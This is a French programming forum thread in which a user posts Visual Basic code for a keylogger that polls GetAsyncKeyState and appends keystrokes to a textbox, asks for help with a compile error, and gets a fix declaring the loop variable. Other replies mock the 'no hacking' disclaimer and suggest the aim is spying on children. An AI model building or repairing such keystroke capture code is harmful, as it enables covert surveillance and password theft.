Key logger visual basic
Résolu
Profil bloqué
-
arth Messages postés 84 Date d'inscription Statut Contributeur Dernière intervention -
arth Messages postés 84 Date d'inscription Statut Contributeur Dernière intervention -
Bonjour,
voici mon code
Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
End Sub
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For I = 1 To 255
result = 0
result = GetAsyncKeyState(I)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(I)
End If
Next I
End Sub
Mais visual basic 2010 express dit que Une constante ne peut pas être la cible d'une assignation.
Il affiche des vaguelette sur I (après for)
Aidez moi svp
Attention je n'est pas l'intention de faire un keylogger pour piraté.
voici mon code
Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
End Sub
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For I = 1 To 255
result = 0
result = GetAsyncKeyState(I)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(I)
End If
Next I
End Sub
Mais visual basic 2010 express dit que Une constante ne peut pas être la cible d'une assignation.
Il affiche des vaguelette sur I (après for)
Aidez moi svp
Attention je n'est pas l'intention de faire un keylogger pour piraté.
4 réponses
-
J'ai jamais fait de visual basic, mais ça serait mieux avec un
Dim I as Integer
Au début du code?-
-
Public Class Form1 Dim result As Integer Dim I As Integer Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load End Sub Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick For I = 1 To 255 result = 0 result = GetAsyncKeyState(I) If result = -32767 Then TextBox1.Text = TextBox1.Text + Chr(I) End If Next I End Sub
-
-
-
"Attention je n'est pas l'intention de faire un keylogger pour piraté."
Mouarf ^.^ l'est bien bonne celle-là ... -
-
Au lieu de voir ce qu'ils font, il est préférable de limiter ce qu'ils peuvent faire via des softs de contrôle parental par exemple.
Un keylogger pour "espionner" ces enfants, puisque c'est de ça qu'il s'agit.